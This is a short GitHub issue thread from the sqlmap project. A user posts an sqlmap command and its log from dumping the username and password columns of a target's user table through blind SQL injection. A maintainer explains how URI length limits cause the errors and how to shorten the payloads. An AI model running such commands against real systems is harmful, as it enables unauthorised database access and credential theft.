### ISSUE TITLE
Boolean-based blind and waf protection ?

### ISSUE THREAD

**Issue by iwantaturboman** [sqlmapproject/sqlmap#2612]
## What's the problem (or question)?
I can retrieve data during some short lap time then some "unexpected HTTP codes" (like 414 or 400) appear denying sqlmap to retrieve more.

## SQL injection
We are on a case of a Boolean-based blind (URI) with Parameter replace (DUAL).
Back-end DMBS is MySQL 5.
Database : webdb
Table : user
Columns : username, password

`sqlmap.py -u "http://www.target.com/profile/*user" -D webdb -T user -C username,password --dump --no-cast --tamper=between`

Log : 
[INFO] fetching entries of column(s) 'password, username' for table 'user' in database 'webdb'
[INFO] fetching number of column(s) 'password, username' entries for table 'user' in database 'webdb'
[INFO] resumed: 15427
[INFO] resumed: 3dd7d2a0edaf63da0d24924ef25a86a6
[INFO] resumed:  user01
[INFO] resumed: d9c0f2d5332d3a7db32e1ab?d?a 9670
[INFO] resumed: ?AAAA?????\x02?
[INFO] resumed: 6
[WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[INFO] retrieved:
[WARNING] unexpected HTTP code '400' detected. Will use (extra) validation step in similar cases
[INFO] retrieved:
[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[INFO] retrieved:
[INFO] retrieved:
[INFO] retrieved: !
[INFO] retrieved:
[INFO] retrieved:
[INFO] retrieved:
[INFO] retrieved:
[INFO] retrieved: None
[WARNING] Ctrl+C detected in dumping phase
[INFO] analyzing table dump for possible password hashes
[INFO] recognized possible password hashes in column 'password'

## More
1. After some characters are retrieved, stop the scan (Ctrl+C) during dumping phase and repeat this.
2. `--hex` with same issue
3. `--identify-waf` tells nothing but...
4. For me we are in case where server blocks too many requests. Could it be ?

**Comment by stamparm** [comment]
http://www.checkupdown.com/status/E414.html:

![414](https://user-images.githubusercontent.com/921555/28288861-de160594-6b40-11e7-94ea-1cc101553784.png)

So, if web server has some low character count as a limitation for URI length, then sqlmap physically won't be able to crunch the hole SQLi query inside of it. You could try something like `--no-cast`, but if that fails too, you are most probably having a server with tight URI length constraint.

As a final resort, you could watch for payloads performed by sqlmap (e.g. `-v 3`) and try to manually squeeze them before usage inside (e.g.) browser. That could help too.

**Comment by iwantaturboman** [comment]
Thanks mate.
